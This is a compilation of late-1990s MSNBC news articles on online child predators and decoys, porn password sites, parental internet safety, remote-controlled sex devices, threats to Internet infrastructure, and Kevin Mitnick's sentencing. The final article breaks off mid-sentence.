DECOY’S VIEW Donna, a volunteer undercover decoy who lures chatroom pedophiles into the arms of police, says anyone who doubts how widespread the online sex trade has become should try posing as a 15-year-old girl in an adult chatroom like AOL’s “Barely Legal” forum. Donna, a concerned parent, goes undercover to prowl chatrooms for pedophiles. "I can count to 10, and by that time I’m already being hit on,” said Donna, who asked that her last name not be used to diminish the threat of retaliation from those she has helped prosecute. “... Individuals are coming in and sending me private messages asking me, ‘Do I like 40-year-old men?’ and asking me about different sexual situations. I’ve had them mail me plane tickets. I’ve had them offer me their condo on the beach if I just come stay for the week. Anything, anything that a child will want. "If you’re a troubled teenager, it’s an absolutely easy way to make quick money. ... You can almost have an auction. You can sit there and say, ‘Well, this guy just offered me 50 bucks.’ ‘Well then, I’ll offer you $100.’ And she can barter herself and set the time and place. How easy is that?” In the Quinn case, the tip that launched the investigation came from one of the alleged hookers. But more and more often, citizen vigilantes like Donna and agencies that focus on sexual abuse of children are playing a key role in bringing prostitution cases to the attention of authorities — and in particular, those that involve minors. Ruben Rodriguez, director of the National Center for Missing and Exploited Children’s Cyber Tipline, said his staff has seen substantial growth in the number of pedophiles using chatrooms to lure unsuspecting children teens into situations where they are likely to turn to prostitution. -=- Sex Password Sites ~~~~~~~~~~~~~~~~~~ Password sites: free thrill or a ploy? They may look illicit, but some are in cahoots with pay sites The 70 to 75 password sites on the Web have similar appearances -- and content. By Mike Stuckey MSNBC Pssst! Hey, buddy, wanna look at the latest, greatest Internet porn for free? Pictures, videos, erotic stories and live sex chats — it’s all yours for nothing. LURKING AMONG thousands of sites in the World Wide Web’s red-light district are some that appear to offer an extra layer of illicitness. So-called “password” sites have proliferated for years, appearing to grant their visitors free access to a cornucopia of otherwise expensive adult content. In truth, however, while some adult Webmasters rail against the password sites, others are in league with them and actually use them as part of their marketing efforts. The password sites have a similar look, with lists of adult Web site addresses, user names, passwords and critiques. Often, surfers don’t even need to log in to the pay sites manually; instead, the password site operators code their lists so a single mouse click appears to take porno pirates right through security screens. So what’s the attraction in ripping off a bunch of passwords to adult Web sites and giving them away? Money, naturally. “Go to my site,” says one New Zealand Webmaster in a telephone call, “and I’ll give you a tour.” This entrepreneur — we’ll call him Joe — spoke with MSNBC on the condition that his name not be used and says he is “probably the biggest” password baron on the Web. “I do a million bucks a year.” That couldn’t be confirmed, but other password and pay-site operators generally confirmed his comments on how the business operates. On this day, the first thing a surfer sees on Joe’s home page is a banner ad for a hard-core sex site. PAY-PER-CLICK “That’s pretty much the first way we make money,” Joe says. Like mainstream Web advertisers, porn peddlers pay for every click their banner ads generate. It doesn’t stop there. “If people go to that site and buy in we get half that money.” More lucrative, says Joe, is the sale of the top positions in the password lists themselves. The first “purloined password” on his list is really an ad for a site that paid $14,000 for a month’s run. Users who click on it, in fact, are whisked to a page full of porn snippets and colorful exhortations to sign up for membership, nothing that any Web surfer can’t come across on his own. Joe also sells the second and third spots on his password list, which also take users to membership come-ons rather than actual password-protected porn. Below the top three, however, are some passwords that appear to give users illicit access to adult content on pay sites. Among pay-site operators who have found passwords to their pages listed on such sites is Seattle-based Internet Entertainment Group, one of the kingpins in Web pornography. “We’re very much against the password-theft sites,” says IEG President Seth Warshavsky, who points out that in addition to protecting revenue, passwords are intended to keep underage users from viewing pornography. “We actually quite regularly send cease-and-desist letters” to the operators of such sites. IEG’s attorney, Derek Newman, provided MSNBC with a copy of a letter his firm sends to operators of Web sites that post passwords to IEG pages. Citing federal and state laws, the three-page document makes a number of legal threats to such Webmasters, from lawsuits to vast fines. “As a general rule, the password sites are very responsive to the cease-and-desist letters,” Newman says, and IEG has never sued one. That’s true, say New Zealand-based Joe and other password-site operators. “We don’t need to run them. We just pull them off our sites.” FTC STEERS CLEAR The issue hasn’t appeared on the radar screens at the Federal Trade Commission, which has taken the lead role among U.S. agencies that investigate and prosecute fraud on the Web. An FTC spokeswoman says it would be considered a “business-to-business” issue, calling for civil action. While Warshavsky believes password sites buy and hack for their wares, Joe and others say many of the passwords are simply given to them by users who signed up at a pay site and then felt ripped off. “There’s a lot of absolutely ruthless Webmasters out there,” Joe says, operations that overcharge users’ credit cards or greatly exaggerate the content on their sites. Password sites are “almost the crucible that people use to get them back,” says Joe. Aside from simply being given the passwords, Joe and other Webmasters say, there are other ways to get them. Many sites simply copy passwords from other password sites. A British Webmaster tells of software that “basically just sits there, goes out every two to three hours and looks for passwords on every site and copies them.” A tour of password sites shows this to be true, with many of them listing the same sites, logons and passwords, sometimes in the same order. HACKING FADES Then there’s hacking, either by using programs to try many combinations of common user names and passwords over and over again or simply stealing entire files of passwords. But password posters say that as security has grown on the Web those methods are harder than they used to be and not employed as often. Whether Webmasters like Joe are given the passwords or steal them, it’s up to pay-site operators to protect themselves, says one. Traci Earl operates a number of Netherlands-based adult pay sites and does business with password sites. “The problem is not password sites, which have always been around and are simply a fact of life in this business,” Earl says. “The real underlying problem is that of insecure passwords. Passwords get shared in offices, in bars, by email, by being posted to conferences and newsgroups and by a thousand other routes.” Earl says there is a “simple, foolproof and highly necessary strategy for anybody who is serious about running adult pay sites” to deal with the problem of improper password use. All they need do, Earl points out, is run logging software that lets them know how often and from how many different locations user IDs and passwords are being used. It quickly becomes obvious when one is being abused and it can then be rendered inoperable. ‘IRRELEVANT’ “Serious adult webmasters know that once the problem of insecure passwords has been fixed then the password sites are at worst irrelevant and at best are a potential source of traffic,” says Earl. For Webmasters like Earl, that traffic has generated an “if-you-can’t-beat-’em-join-’em” attitude. That, says Joe, has led to a bit of a boom in password sites. From a handful several years ago, the sector has grown into 70 to 75 sites, he and his European colleagues estimate. “We have half a million unique people come through our site a day.” Joe himself will post passwords to his own pay sites as if they are “hot,” then kill them a short time later. Users quickly flood the pay site and some will sign on as paying customers, he says. Other pay-site Webmasters use ruses in conjunction with getting their passwords posted on sites like Joe’s. One is to send users who attempt to use “illicit” passwords to an ominous warning screen that tells them their identity has been noted and they will be in big trouble for trying to use a stolen password if they don’t sign up at once for a paid account. “It’s a load of rubbish,” says one European password-site operator. “It’s just a way to get you to join.” But such tactics work, says Earl, because “You have to remember that the customers for pay sites are not sophisticated surfers. They are, in the main, middle-aged and new to the technology.” That also explains the draw of password sites themselves. “The lure of something for nothing is very powerful.” Earl says. “In truth, there is very little available on pay sites that is not available for free somewhere on the Net if you have the skills and the knowledge to know where to find it.” The password-site operators themselves have come up with some inventive ways to explain what they’re doing. A “disclaimer” on some of the sites notes that it is intended solely to alert pay-site operators that their passwords have been compromised. You can almost hear the winking. Protecting your kids ~~~~~~~~~~~~~~~~~~~~ By Bob Sullivan MSNBC Many safety guides for children using the Net read as if they were written by Robert Fulghum. Everything I ever needed to know to stay safe in the virtual world, I learned in the real world. Don’t go scary places by yourself. If someone is making you uncomfortable, just leave, and tell your parents. Don’t look at pornographic pictures, and you won’t have to worry about them. But most important — don’t talk to strangers, and never give them personal information. Unfortunately, it’s not that simple. IF IT WERE SIMPLE, you can bet that earlier this month there wouldn’t have been 100 alleged pedophiles arrested and tens of thousands of pictures of children — as young as 2 years old — seized. See the MSNBC story. It’s not simple because strangers online are hard to identify, since the Net is the land of make-believe. And just as kids are often better than their parents at playing make believe, they’re often better at keeping up with technology, too. Some are tempted to dismiss the problem as no different from your teen-age son sneaking a peek at Playboy — on paper, or online. No big deal. True, experts say. The problem is not nudie Web sites. Most of those require credit card numbers, anyway. “Pictures don’t hurt kids,” said Parry Aftab, author of “A Parent’s Guide to the Internet.” “People hurt kids…. As long as parents think the only real risk is the kids will see adult sex content, they won’t do anything.” MSNBC’s parenting on the Net survey The real problem is people who lurk in chat rooms and Internet Relay Chat (IRC) channels who hope to lure your child into having online sex or a face-to-face meeting. It’s impossible to say how many pedophiles there are lurking on the Net, but if you doubt the severity of the problem, log on to almost any IRC channel. You’re unlikely to last 60 seconds without being propositioned. U.S. customs agent Marcus Lawson pretends to be young boys or girls for a living. He arrests about 30 pedophiles a year — as big a caseload as he can handle. When MSNBC interviewed him, he was working an IRC “dad-daughter sex” channel. There were 73 users. (“Hmm. He wants to know if my daughter has breasts yet. I’ll tell him no.”) “I don’t think the Internet has created more pedophiles. It’s removed the societal stigma that kind of kept people in check,” he said. “Before the Net, pedophilia was a lonely business. Now 24 hours a day, seven days a week, you can validate yourself, find hundreds and hundreds of people who will tell you there’s nothing wrong with having sex with children.” NBC’s Pete Williams reports on one man’s battle to catch pedophiles on the Internet. So the real trouble for your kids begins not with information coming into your computer but with what goes out of your computer. The problem is what your child says in e-mail, posts to a bulletin board or writes in a chat room. And this is where things get complicated. Think you can simply tell your child not to e-mail strangers? This reporter was put in a very uncomfortable situation doing this story. The bulletin board thread related to this piece had an entry from a poster identifying herself as a 17-year-old girl who felt her parents were too controlling — they read her e-mail, observed her online, etc. MSNBC felt it necessary to write to the girl to confirm her identity and age as authentic. But that left us in the uncomfortable situation of sending an e-mail to a minor, asking her to call us or send us her phone number. That’s exactly what she shouldn’t do. For better or worse, she did not respond to our e-mail. Her posting is included in the sidebar of your BBS postings. What else can go wrong? ONLINE COMMERCE: The Internet is a defrauder's heaven. The Federal Trade Commission offers a number of suggestions. More... HATE GROUPS: There's lots of negative racial, ethnic, religious, or gender-based propaganda on the Net - sometimes it's well disguised. More.. LOSING YOUR IDENTITY: Know that it's easy for someone else to pose as you on the Net More.. SPAM: Just an annoyance, but a growing one. More.. VIRUSES: It's easy to pick up a virus using the Internet, even just reading your e-mail. More.. HOAXES: The Internet has raised the Urban Legend to new heights. More.. HARASSMENT: Even though it's just bits and bytes, it's still harassment if you tell someone to leave you alone and they don't. More.. Many authorities suggest using technology to combat technology. About 75 percent of the parents responding to MSNBC’s survey said they’d consider using software to limit their child’s ability to communicate with others over the Internet. Filtering software like NetNanny, for example, can be set to prevent children from even typing personal information such as their name, address and phone number. But users responding to an MSNBC survey were evenly split over whether they’d read their child’s e-mail, as was suggested by the FBI when it issued a parent’s guide to the Net on Sept. 1. “I _HONESTLY_ wonder if most of you realize what you are saying when you say read your kids e-mail,” said David Weaver on the MSNBC Technology BBS. “Reading a kids e-mail is like: Reading normal mail they send Evesdropping on all thier conversations Picking up another phone line when they are on the phone.” One response: “Hands off parenting is not the answer. Blind trust and faith are why you see kids pictures on the back of milk cartons. Now, keep in mind I am not going to go through all their mail every night. They should just be prepare to answer for anything if and when I do.” See a collection of posts to the BBS Stretch that adult monitoring of e-mail argument one step further — Clay Slape of Big Springs, Texas, is incensed that his daughter’s school sent home information saying the district reserves the right to read student e-mail. “If my child writes me a personal e-mail, I don’t want some teacher reading it,” he said. Big Springs Independent School District officials say the point is moot because students aren’t allowed e-mail at all in the district — but the regulation comes from the state department of education, so expect concerned parents all around Texas to wonder out loud about their child’s First Amendment rights. While three-quarters of MSNBC respondents said they’d consider technological help, few actually use it. Filtering software has so far been a bust. A FamilyPC survey published late last year indicated only 4 percent of parents use parental control software. A survey of Baltimore school district parents done earlier this year produced similar results. Net filtering software PC Magazine editors preferred Cyber Snoop, noting that parents can modify the list of restricted sites. Most products keep their lists a secret. NetNanny also allows access: Program Check MSNBC for reviews on these products - Ed Cyber Patrol www.cyberpatrol.com Cyber Snoop www.pearlsw.com CYBERSitter www.solidoak.com Cybersentinel www.securitysoft.com Net Nanny www.netnanny.com SurfWatch www.surfwatch.com Time's Up www.timesup.com WatchDog www.sarna.net/watchdog WebChaperone www.webchaperone.com X-Stop www.xstop.com These programs work in a variety of ways, but generally either block your computer from a predetermined set of yucky Web sites; limit your computer to a predetermined list of Web sites; or block individual Web pages with offensive words. It’s easy to see the limitations of all three, and apparently parents have, too. Aftab, who thinks filtering software can be an aid for parents, says some mistakenly believe the software is too technical to use or easy for clever kids to foil. Or they shrug and say, “I trust my kid.” But experts say parents often aren’t really aware of the extent of the trouble their kids can get in on the Internet. That’s why this week is National Kids Online Week, and AOL’s Steve Case and Secretary of Education Richard Riley will be kicking off on Tuesday a nationwide parental education program called “America Links Up.” And that’s why Seattle police detective Leanne Shirey starts her seminars for parents by posing as a 14-year-old girl in an AOL chat room. She then lets parents watch as a pedophile “grooms” her. There’s never a need to fake the demonstration. “The problem is we educated kids before we educated the parents,” Shirey said. “Some of these people I see have never turned on a computer. They have to understand that even if they don’t have a computer at home, they have to have rules.” More safety resources If you see evidence of illegal activity, call local police and/or write to cybersmuggling@customs.sprint.com http://www.safekids.com Has tips for parents, including advice on handling the Net posting of the Starr report. Operated by Larry Magid, a syndicated columnist for the Los Angeles Times, the site is sponsored by the Online Safety Project, funded by America Online, Network Solutions and Disney.Com http://www.bcplonline.org/online Baltimore County schools' Parent Internet Education site. Includes a sample curriculum. http://www.americalinksup.org Home page for organization sponsoring National Kids Online Week events. Includes searchable database of about 100 local educational events. Also includes sample curriculum. http://www.fbi.gov/tips.htm FBI's "A Parent's Guide to Internet Safety" http://www.cyberangels.org/Volunteer Internet watchdog organization that maintains lists of kid-friendly sites. Founded by Curtis Sliwa, Guardian Angels founder. Baltimore County Public Schools held an America Links Up “teach-in” for parents Sept. 14. Coordinator Della Curtis says the survey of parents in the 104,000-family district showed that most don’t know what their children are doing in school with the Internet, and that lack of information is a chief cause of anxiety. “I know of one parent who … took the keyboard with her when she left the home,” Curtis said. You might call that filtering hardware. Not terribly constructive. Here’s a collection of suggestions from several experts that’s a little more practical: There is no substitute for keeping up with the technology. Don’t shrug or say it’s beyond you. If it is, ask your children to train you. That will make sure you keep up with them. Learn how to examine your Web browser’s “History” files, or cache. Even if you don’t do it, make sure your children know it’s possible for you to know where they’ve been.. For Netscape Navigator 3.0, for example, it’s in C:\Program Files\Netscape\Communicator\cache. Look around your desktop, start menu or applications folder for suspicious programs. Keep abreast of all your child’s e-mail accounts; understand that free Web e-mail may allow your child to have plenty of e-mail accounts you don’t know about. If your child will chat, take some time to come up with an alias, or fake name. Aftab even suggests you give them a fake address and phone number so, if they’re being harassed, they have a way of vacating the situation. Play around in Usenet and IRC chat rooms so you can talk to your children intelligently about them, and perhaps decide to ban their use. Contact your Internet provider to see what kind of Usenet groups are available; you can download an IRC program from this site. Of course, the Robert Fulghum-style advice is useful. Do the things you would normally do in the real world. Get to know your children’s cyberfriends — certainly don’t let them meet anyone in person without your attendance. -=- Sex toys blaze tactile trail on Net Adult industry’s newest twist: Devices that vibrate, tickle at click of a mouse Vivid Entertainment Inc. hopes to begin selling its "cyber sex suit," which comes in both male and female models, early next year. By Mike Brunker MSNBC Oct. 4 — This is clearly not what AT&T had in mind, but entrepreneurs in the online sex industry have figured out a way to use the Internet to literally reach out and touch, tickle, buzz or scratch someone. And while “cyberdildonics” and the “cyber sex suit” may not move the Earth outside the world of online sex, as the first products to explore the Net’s tactile possibilities they are likely to touch off a commercial land rush to the new frontier. THE ONLINE SEX industry has long played a pioneering role in moving innovative Net technology like live video and interactivity into the mainstream. The creators and users of the cyberdildonics and the cyber sex suit say they expect their products to continue that trend. “If you can control a sex toy through your monitor, you can control just about anything,” said Allen Hadazy, president of SafeSexPlus.com, which has reported brisk sales of the cyberdildonics devices since their debut in April. “Controlling devices remotely through an everyday Internet connection isn’t the future. It’s here now.” But some observers of the technology sector say the primitive state of tactile technology relegates the latest in orgasmic gadgetry to the curiosities category. ‘IT DOESN’T REALLY EXIST’ “I’m interested in why people are fascinated with this idea (sex at a distance), even though it doesn’t really exist and may never exist at that realistic, immersive level,” said author Howard Reingold, who first used the term cyberdildonics in his 1991 book “Virtual Reality.” The two devices employ very different strategies to reach their goal, which the creators of the cyberdildonics sex toys have dubbed “feel-good Internet.” In their case, the developers simply took an offline technology — electric vibrators and other sex toys — and created a devilishly simple but clever system that allows their speed to be controlled over an Internet connection. "It’s going to be very beneficial, I imagine, for military couples, and I think (there is) going to be a day when these toys are given as bachelor and bachelorette gifts much more than lingerie and strippers and stuff,” said Cheyenne, an adult-site webmistress who offers customers the option of using cyberdildonics in video-chat sessions. SENSORS IN A NEOPRENE BODYSUIT The cyber sex suit, on the other hand, is strictly a for-the-Net creation: a neoprene bodysuit equipped with 36 sensors that, at the click of a mouse, can deliver a handful of sensations to the wearer. "It may bring you to full orgasm; it may not,” said Lisa, a model who has served as a test subject for the cyber sex suit, which is expected to go on sale early next year. “... It’s not about that. It’s more about playing with your partner.” But David James, president and co-founder of Vivid Entertainment Inc., the suit’s developer, said that he expects the invention to turn the online porn business on its ear by allowing suit-wearing customers to participate. "The suit (will) … virtually revolutionize the 900- and 800-number-type business,” said James, a Welsh immigrant whose first job was hard labor in a coal mine in his native land. “…That actually is where the very big money would be in the future.” He also figures his Van Nuys, Calif.,-based company, which also produces adult television fare, operates a passel of porn Web sites and bills itself as the world leader in Digital Versatile Disc (DVD) technology, could profit by selling DVD discs with new themes and sensations each month to those who purchase a suit. SEX TOYS SELLING BRISKLY The early reception given the cyberdildonics line — coupled with the fact that the online sex business is now pulling in roughly $1 billion a year, according to analysts’ best guesses — suggests the appetite for such online accoutrements is keen. Hadazy, whose San Francisco-based firm developed the sex toys, which range in price from $29.99 to $99.99, said sales have climbed to between 50 and 100 units a day without any advertising. Most of the sales have been to members of the Intimate Friends Network (commonly known as Ifriends), a 1.9 million-member online community whose members provided the impetus by requesting a line of sex toys for both men and women that they could use in conjunction with adult video chat, Hadazy said. “The users of this service, over time, began to request that the intellectual stimulation they enjoy over the service be augmented with actual physical stimulation,” he said. “Some of the users suggested a few clever ideas and the result was SafeSexPlus.com, which markets and sells the cyberdildonics devices.” The key that allows a user to remotely control the devices is a photo diode that is attached to the computer monitor with a suction cup and responds to changes in brightness on the screen. “As those pixels brighten, the intensity of the device will increase; as the pixels darken, the intensity will decrease,” Hadazy explained. “The remote user, elsewhere on the Internet, is in effect in control of the brightness of a section of your monitor. And that’s what makes the device completely and utterly cross platform and supported by any Internet connection.” DIFFERENT SET OF DIFFICULTIES Developers of the cyber sex suit faced a different set of difficulties, namely mimicking sensations produced by real world touch. Vivid Entertainment's David James and Lisa, a model and suit tester. James, the president of the Van Nuys, Calif.,-based Vivid Entertainment, said the suit works like this: The initiator uses software on his computer to select one of five sensations — tickle, pinprick, vibration, hot or cold — and direct it to a specific part of the suit wearer’s body. An electronic signal is sent to a DVD player, through the Internet, to the suit wearer’s computer and finally to the suit itself, where it activates the appropriate sensor. “To be honest, it’s nothing magical,” he said. “I’m sure a pair of college students could have probably sat down and come up with something far more futuristic than we have here. The big advantage we’ve got, of course, is our marketing ability to first of all have it made and then be able to sell it worldwide.” He said the company has spent about $180,000 to develop the suit, which he said will retail for about $170. But before seeking approval from the Federal Trade Commission to market the suit, James’ team must conquer a final sticky problem: Ensuring that the range of electrical sources and delivery systems around the world don’t trigger a potentially dangerous electrical surge. FEARS OF A SURGE "If, for example, a chap was wearing a pacemaker ... and he’s hooked up to a generator ... he could (be) fried or whatever by that extra power going through it,” James said. Despite such difficulties, some observers see the advances incorporated in the cyber sex suit, particularly its use of DVD technology, as an important step toward a new breed of interactive products that incorporate some sensory capability with high-resolution video for a more-realistic experience. “I can really see programs, like maybe golf or tennis or skiing ... where it would be necessary to have kind of a virtual environment,” said Julia Rivera, executive producer of Inside DVD magazine. “So say if you go the golf DVD, you would be able to connect and take a golf lesson. And because of the video capability of the DVD, you could select the best golf courses in the world (to practice on).” But researchers say the primitive state of tactile technology today means that dramatic advances will be needed before such programs can be created. And they warn that the computer generation’s holy grail — virtual reality — remains years if not decades in the future. In order to create a realistic computer-simulated environment that would allow a user to “touch” other inhabitants of the virtual universe, tactile sensors must be able to both register the computer user’s position and render feedback, said Ian Davis, director of technology with computer game-maker Activision. ‘A LOT OF OBSTACLES’ “There are a lot of obstacles,” he said. “The underlying technology is pretty rudimentary right now. There is some ability to do ‘force feedback’ and some ability to measure the location and angles of joints on the human body, but it isn’t robust yet and is still years away from being technically solid.” Mel Siegel, a senior research scientist in robotics at Carnegie Mellon University, said the biggest problem is the complexity of the information required for the brain to determine the shape and texture of an object. "You put your finger down on a complex surface and you really don’t get a great deal of information from that,” he said. “You now move your finger over that complex surface and you start to understand the shape and structure of what you’re feeling. And I think the hard part (of simulating touch) is that dynamics.” That hurdle has stopped previous attempts to incorporate any but the most basic tactile sensations in computer applications, and it will again prevent the technologies pioneered by the cyberdildonics and the cyber sex suit from having much of an impact, said computer scientist and high-tech visionary Jaron Lanier, credited with coining the term “virtual reality.” “There have been things like this for a long time,” said Lanier, who recalled seeing similar suits and remote-controlled dildos more than a decade ago. “…I think there’s nothing new here except for the scale of it. There’s a lot of money and a lot more people on the Internet now, so from a social point of view this would be new. But I’m going to predict failure for it.” -=- Will hackers or spies knot the Net? A decade after the ‘worm,’ network still vulnerable, experts say By Mike Brunker MSNBC July 23 — Despite major security advances in the 10 years since a Cornell student unleashed a computer program that crippled the Internet, the vast but vulnerable network still could be taken down by a single hacker bent on bagging the biggest trophy of all, security and law enforcement experts believe. "GIVEN THE VULNERABILITIES that we know about … and the kinds of tools that we’ve seen in the intruder community, it certainly is possible to bring the entire Internet down for a short period of time,” said Tom Longstaff, research and development manager at the Computer Emergency Response Team [CERT] at Carnegie Mellon University. “Now keeping it down for a long period of time is a much more difficult task.” The impact of even a short shutdown is hard to gauge, but experts say that the increasing reliance on the Internet by businesses big and small means there would be significant economic disruption. Michael Higgins, vice president for Global Integrity Corp., a security firm that does considerable work in the banking industry, estimates that a “major shutdown” of eight hours or more could cost "billions of dollars" in lost economic opportunity. While not discounting the threat to the Net from either a destructive hacker or a hostile foreign power, law enforcement and the computer security industry are focused on keeping intruders out of end-users’ systems — a logical priority given the increasing numbers of computer and network break-ins they are seeing. QUESTION OF ‘MOTIVATION’ “There’s always a requirement of motivation for you to try to determine how likely something is,” said Michael Vatis, an FBI agent who is heading up the Justice Department’s newly formed National Infrastructure Protection Center [NIPC]. “And right now, there is a lot more motivation for people to use the Internet as a vehicle to go after particular targets … rather than [launch] an amorphous attack on the Internet itself.” But Longstaff says CERT, which serves as a clearinghouse for hacking reports and distributes security fixes as they become available, is seeing a corresponding increase in the number of attacks on the Internet itself. "We've seen a disturbing trend that shows more and more attacks aimed at the infrastructure of the Internet itself … at routers that route traffic around the Internet and … the name servers that make the Internet operate correctly by resolving how to send packets from one place to another and how to name them,” he said. The uneasiness of Longstaff and other security experts is heightened by the nagging thought that history might repeat itself. The seemingly farfetched idea of a lone Lilliputian bringing the global Gulliver to its knees became a reality Nov. 2, 1988, when Robert T. Morris, a Cornell University computer student, unleashed the “worm” that bears his name. The worm — a computer program designed to penetrate UNIX-based computers and then replicate itself on computers connected to the host — spread like wildfire through the Internet, which was less than 1 percent of its current size. Within hours it had infested at least 6,000 systems and crashed the network. Time line: hacking and the Internet “What brought the Internet down wasn’t that the worm did any specific damage to the infrastructure,” said CERT’s Longstaff. “It simply took so much of the resources from the computers that it broke into and from the networks as it was trying to find new computers. … The Internet effectively shut down because of overuse, because there just wasn’t enough capacity to run the worm and anything else too.” FALLOUT FROM THE ‘WORM’ Though Morris insisted he didn’t mean to crash the network, his worm turned assumptions about Net stability upside down, giving birth to the CERT at Carnegie Mellon University in Pittsburgh and generally jump-starting the entire field of computer security. The intervening years have seen countless improvements in computer and network security — including a “patch” to fix the UNIX flaws exploited by the Morris worm — and much better communication and faster distribution of solutions when new problems are discovered. But despite that progress, the infrastructure of the Internet — the major routers that direct traffic from the network’s high-speed trunk onto regional branches, the Domain Naming Service [DNS] system, and even the fiber-optic cables that carry the electronic packets around the world — remain at risk. “When you attack a network you can attack the channels, but the channels are multiple in the Net,” said N.E. Kabay, director of education at International Computer Security Association Inc.[ICSA], a for-profit security consortium. “But you can also attack the control structures that determine things like addressing and how information gets transferred through the Net. And in those circumstances, I think you have a real problem.” An example of that type of attack, albeit on a much smaller scale, occurred in July 1997, when the InterNIC domain registry operated by Network Solutions was invaded by a business rival. Eugene Kashpureff, operator of AlterNIC, pleaded guilty in March to designing a corrupted version of InterNIC’s software that quickly spread around the world to other DNS servers and prevented tens of thousands of Internet users from being able to reach many Web sites in many .com and .net domains. The software also “hijacked” visitors to InterNIC’s Web site, rerouting them to the AlterNIC home page. DENIAL OF SERVICE ATTACK Most experts say that some type of denial of service attack — an electronic bombardment of key routers with phony packets — would be the most likely way of deliberately crashing the network. A similar scenario in which routers operated by telecommunications companies would be isolated from each other was floated by members of the Boston hacking group L0pht (pronounced “loft”), who testified in May before the Senate Government Affairs Committee that they could pull the plug on the worldwide network in less than 30 minutes and keep it down for “a few days.” Representatives of the telecommunications companies that control the major Internet switching yards did not respond to requests for interviews. Marcus Ranum, CEO of Network Flight Recorder, which develops security tools for network managers, said that the main drawback to such an attack is that it would quickly draw heat to the source. "The problem is that to keep it down, you’d have to be actively trying to keep it down, which would increase the chance of the good guys catching you,” Ranum said. “… It’s kind of like the business of being a sniper in a bell tower: The more you shoot, the easier it is for other people to find you. And you’re not going to do a lot of damage unless you shoot a lot.” Ranum said that a master hacker could probably create a remote mode of attack that would disable the Net’s key components while masking its creator’s identity. But denial of service attacks are by no means the only weapons at the criminal hacker’s disposal. Many experts believe an updated version of the Morris worm could again wreak havoc. COULD WORM RETURN? Chris Goggans, a former member of the notorious hacker group Legion of Doom turned security consultant, created ripples of concern in 1996 by telling the Electronic Engineering Times that all a hacker would have to do is “take parts of the existing Morris code, easily combine it with some of the newer attack programs, and launch it again.” Or an attacker could employ tactics that have been used - such as mail-bombing - on a much grander scale. "Unsolicited commercial email [or SPAM] could be used … to attack the net,” said Kabay of ICSA. “…You could argue that this isn’t an attack on the Internet, but if it was done to millions of people, the increased traffic plus the unusability of email would certainly be viewed as an attack on at least a component of the Internet.” One of the hardest attacks to guard against is the low-tech approach — known in security circles as the “backhoe attack.” “Just go in and cut the fiber [optic cable],” as Goggans said in his 1996 interview. “Most of the domestic Internet and all of Europe is connected [at an Internet exchange point in Virginia], so you could wipe out everything for days. If you cut several times in several different places, you could wipe it out for weeks.” POROUS BY NATURE Part of the difficulty in securing the Internet’s infrastructure and protecting it from ancillary attacks lies in its structure, which was designed to facilitate communication, not thwart invaders. The Internet’s was “created to be used by a group of trusted people,” said Robert Hundley, a Rand Corp. researcher who in 1995 co-authored a report that labeled the Net a sitting duck for criminal hackers — “crackers” is the term preferred by non-destructive hackers — or hostile governments. “It has evolved way, way beyond that.” Still, warnings that the entire Internet could be taken out aren’t given more credence largely for one reason, security experts say: It’s difficult to envision why someone would want to do it. In the case of a single hacker, it would take a gifted, if twisted, individual who most likely be driven by egotism and malice. “You’d have to have … that destructive mentality … and this is not an unsophisticated attack,” said Higgins, the Global Integrity Corp. “… I just don’t see that type of threat present today, not from an individual.” "I think the only case where it would be likely to happen is if you had somebody who wanted to move themselves into the ranks of the elite superhackers and was trying to show off,” said Ranum, adding that a hacker who nailed the Net would quickly become a pariah among his peers. “Somebody would do that and it would happen for a little while and then get fixed. And then we’d hunt that guy down and kill him,” he said with no hint that he might be joking. Some experts say a more likely scenario would be one in which a terrorist group or hostile foreign power would bring down the Internet as part of a larger effort to sow confusion and fear in technologically advanced nations. “Right now, what we can say publicly is that we do have information that several countries are developing the policy, the doctrine and the technical capability to carry out that sort of attack as one component of a military strategic plan,” said Vatis, head of the Justice Department’s NIPC, the infrastructure protection center. “And we have to be in position to defend against it and also to get early warning of it.” ‘INFOWAR’ FEARS The NIPC is the biggest single indication that the U.S. government is serious about coming to grips with the threat of cyberterrorism. In fiscal 1999, the office will have 125 employees at its headquarters in Washington, D.C., agents in each of the FBI’s 56 field offices and eight regional computer squads with “robust capabilities equipment” that will allow them to conduct field investigations, Vatis said. But while the threat of Internet terror has gotten attention on Capitol Hill in recent months, some in the private security industry believe the danger is being overblown. “The [government] has a vested interest in expanding its domain into cyberspace,” said Ranum. “I don’t really see any threat there. It’s not that it’s impractical, but the U.S. certainly could run without the Internet. It’s not as if the country would grind to a halt. It’s not as if the country would be unable to fight a war if the Internet were down. .. The whole scenario is very attractive in a kind of Tom Clancyesque way, but I really think it’s pretty silly.” Vatis calls such criticism “baseless.” "The idea that this is all being invented or exaggerated by the government is belied by the record that exists out there, he said, adding that the FBI currently has a case load of nearly 500 hacking cases, an increase of 130 percent over the past two years. Whether or not an attacker actually brings down the Internet, experts agree, the global giant will remain at risk for some time to come because research has been concentrated on issues deemed more pressing. “We’re doing more and more on the Internet, but if you look at the security issues… we are really targeting the realm of confidentiality and integrity of [financial] transactions … [not] the availability issue,” said Higgins of Global Integrity. “That is our most vulnerable point, and it will continue [to be] for the foreseeable future.” -=- Mitnick to serve 5 more months, repay $4,125 Hacker barred from using high-tech gear for three years By Mike Brunker MSNBC Aug. 9 — Nearly 4 1/2 years after he was taken into custody, notorious hacker Kevin Mitnick on Monday was sentenced Monday to 46 months in federal prison and ordered to pay $4,125 in restitution. With credit for time served, the conqueror of computer systems at several high-tech companies could be released in January. U.S. DISTRICT Judge Mariana Pfaelzer sentenced Mitnick, 35, before a packed courtroom that included his father, Alan Mitnick, and dozens of his supporters, many of whom believe that he is being severely punished by the government to set an example to other would-be hackers. Pfaelzer, who said it would be “impossible” for probation officials to monitor Mitnick once he is released from custody, nonetheless banned him from using computers, cellular telephones, televisions or any equipment that can be used for Internet access for three years. RESTITUTION CALLED ‘TOKEN’ She called the $4,125 in restitution a “token” amount given the damage she said he inflicted on companies whose computers he infiltrated, including Motorola and Sun Microsystems Inc. She said she settled on the relatively small amount because she considered it unlikely he would be able to earn more than minimum wage given the prohibition on computer use. “I want to make a restitution order that is much, much larger,” she said in rejecting the prosecution’s request that he be ordered to pay $1.5 million to his victims. “But I can’t be sure he can pay it, and any non-payment is going to be a violation of the terms of his release.” Prosecutors initially accused Mitnick in a 25-count indictment of causing an astonishing $80 million in damage by breaking into the computer networks of Motorola, Sun Microsystems, NEC and Novell, among others, preceding his arrest. The charges carried a maximum penalty of nearly 200 years in prison, though sentencing guidelines would have precluded a sentence anywhere near that harsh. But under a plea bargain announced in March, Mitnick stipulated that he caused $5 million to $10 million in damage while invading computers. He has been 